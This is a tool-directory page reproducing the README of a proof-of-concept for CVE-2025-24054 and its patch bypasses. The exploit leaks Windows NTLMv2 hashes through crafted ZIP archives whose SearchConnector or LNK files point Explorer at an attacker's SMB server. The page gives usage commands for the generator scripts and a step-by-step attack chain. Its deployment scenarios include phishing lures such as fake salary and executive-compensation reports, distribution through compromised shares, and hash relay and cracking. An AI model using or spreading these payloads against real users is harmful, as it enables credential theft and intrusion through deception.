Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24054 — Windows文件资源管理器零点击NTLMv2-SSP哈希泄露 | Kitploit
工具/GitHubGitHub/untouchable17/cve-2025-24054
密码破解钓鱼工具Payload生成漏洞分析漏洞利用后渗透利用社会工程学
GitHubuntouchable17/cve-2025-24054

CVE-2025-24054

Windows文件资源管理器零点击NTLMv2-SSP哈希泄露

查看仓库
2159个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Windows 文件资源管理器零点击 NTLMv2-SSP 哈希泄露

🎥 演示 POC + 2025年3月补丁绕过

NTLMv2 哈希泄露演示

🎥 补丁绕过

NTLMv2 哈希泄露演示

点击上方图片观看漏洞演示

📋 技术概述

本仓库提供了一个全面的研究框架,分析了 Windows Shell 文件格式处理中导致 NTLMv2-SSP 凭据泄露的漏洞链。该工具包实现了两种不同的攻击向量,利用 Windows 资源管理器在文件预览操作期间自动解析 UNC 路径的特性。

核心漏洞机制

根本安全问题在于 Windows Shell 在预览操作期间自动处理特定文件格式中嵌入的 UNC 路径。当用户打开包含特制文件的 ZIP 存档时,Windows 资源管理器会在未经用户同意的情况下自动解析 UNC 路径,启动 SMB 身份验证尝试,并将 NTLMv2-SSP 哈希暴露给攻击者控制的服务器。

攻击面组件

  • 文件格式解析:Windows Shell 自动处理基于 XML 的 shell 文件和 LNK 快捷方式属性
  • ZIP 容器绕过:绕过 Web 标记(MOTW)保护的存档预览功能
  • 身份验证触发:在元数据提取和图标获取操作期间自动解析 UNC 路径

🏗️ 架构演变

🔰 阶段 1:基于 SearchConnector 的泄露(CVE-2025-24054)

文件: ntlm-disclosure-poc.py

该初始实现利用了 Windows Search Connector(.searchConnector-ms)文件,这些文件是基于 XML 的配置文件,用于定义 Windows 资源管理器的搜索位置。当 Windows 在 ZIP 存档预览操作期间自动处理 simpleLocation 元素中嵌入的 UNC 路径时,便会触发该漏洞。

技术特点:

  • 遵循 Microsoft 架构规范的基于 XML 的有效载荷结构
  • 在 searchConnectorDescription 元素中嵌入 UNC 路径
  • 由 Windows Search Indexer 和 Explorer shell 自动处理
  • 绕过传统的文件执行限制

🔰 阶段 2:ZIP 中的 LNK 绕过(CVE-2025-50154 / CVE-2025-59214)

文件: patch_bypass.ps1

这种增强技术利用了 LNK 文件属性,以应对 Microsoft 的初始补丁。该攻击利用 Windows 资源管理器在 ZIP 文件预览期间获取图标元数据和解析目标路径的行为,同时通过仔细配置属性来保持零点击利用向量。

技术特点:

  • 在 TargetPath 属性中包含 UNC 路径的 LNK 文件
  • 使用本地图标引用绕过初始检测机制
  • Windows Shell 在预览期间自动提取属性
  • 在保持文件格式合法性的同时实现 UNC 解析

🔧 先决条件

对于 Python PoC:
  • Python 3.6+
  • 所需包:colorama
对于 PowerShell PoC:
  • Windows PowerShell 5.1+
  • 执行策略:Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

🔰 阶段 1:Python 实现(CVE-2025-24054)

root@kitploit:~
# 基本用法
python ntml-disclosure-poc.py 192.168.1.100

# 自定义输出文件
python ntml-disclosure-poc.py 192.168.1.100 -o some_data.zip

# 输出示例
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir
[*] COMPLETE Package: Project_20241125_143022.zip
[*] Output: PATH\Project_20251123_175037.zip

参数
target(必需):目标 IP 地址或主机名
-o, --output:ZIP 包的自定义输出文件名

🔰 阶段 2:PowerShell 绕过(CVE-2025-50154/59214)

root@kitploit:~
# 基本用法 - 自动删除 LNK 文件
.\bypass.ps1 -IP 192.168.1.100

# 保留 LNK 文件用于外部分发
.\bypass.ps1 -IP 192.168.1.100 -KeepLnk

# 自定义诱饵名称和共享
.\bypass.ps1 -IP 192.168.1.100 -Share documents -File budget.xlsx -Lure FileName -KeepLnk

# 指定输出目录
.\bypass.ps1 -IP 192.168.1.100 -OutDir "C:\Payloads" -KeepLnk

参数
-IP(必需):目标 SMB 服务器 IP 地址
-Share:SMB 共享名称(默认:'share')
-File:目标文件名(默认:'payload.exe')
-Lure:社会工程诱饵文件名(默认:'Your_File_For_Payload_Here')
-OutDir:输出目录(默认:当前目录)
-KeepLnk:在创建 ZIP 后保留 LNK 文件
root@kitploit:~
graph TD
    A[🔴 CVE-2025-24054<br/>初始漏洞] --> B[🛡️ Microsoft 补丁]
    B --> C[🟠 CVE-2025-50154<br/>绕过 #1]
    C --> D[🛡️ Microsoft 补丁]
    D --> E[🟡 CVE-2025-59214<br/>绕过 #2]
    E --> F[🔴 当前状态<br/>活跃利用]
    
    style A fill:#ffcccc
    style C fill:#ffddcc
    style E fill:#ffffcc
    style F fill:#ccffcc

🔧 技术规范

  1. 📦 有效载荷生成
    • 创建包含 UNC 路径的恶意文件(SearchConnector/LNK)
    • 打包到 ZIP 存档中,并附上诱人名称
  2. 📤 投递
    • 通过电子邮件/网页/下载分发 ZIP
  3. 💥 利用
    • 受害者在 Windows 资源管理器中打开 ZIP
    • 自动文件预览触发 UNC 解析
    • NTLMv2-SSP 哈希传输给攻击者
  4. 🎭 利用后
    • 哈希捕获和中继攻击
    • 密码破解尝试

💀 部署场景

📨 场景 1:直接 ZIP 分发

root@kitploit:~
# 创建 ZIP 有效载荷
.\bypass.ps1 -IP 192.168.1.100 -Lure "Salary_Report_Q4_2025"

# 分发向量:
# - 📧 带有社会工程诱饵的电子邮件附件
# - ☁️ 被攻破的文件共享服务
# - 🌐 企业环境中的网络共享投放

🔄 场景 2:LNK 文件传输

root@kitploit:~
# 创建并保留 LNK 文件以进行多主机部署
.\bypass.ps1 -IP 192.168.1.100 -Lure "Project_Documentation" -KeepLnk

# 跨主机部署:
copy-item "Project_Documentation.lnk" "\\remote-server\share\"
# 通过被攻破网站进行网络分发

🎯 场景 3:定向社会工程

root@kitploit:~
.\bypass.ps1 -IP 192.168.1.100 -Share "HR_Documents" -File "compensation_review.xlsx" -Lure "Executive_Compensation_2025" -KeepLnk

联系开发者

root@kitploit:~
- 群组与联系方式:t.me/initial_persistence
- 邮箱:[email protected]
下载工具
向量触发机制用户交互补丁状态
🔗 SearchConnectorXML 解析 + UNC 解析打开 ZIP🛡️ 已修补
📎 LNK TargetPath图标元数据获取打开 ZIP🔴 活跃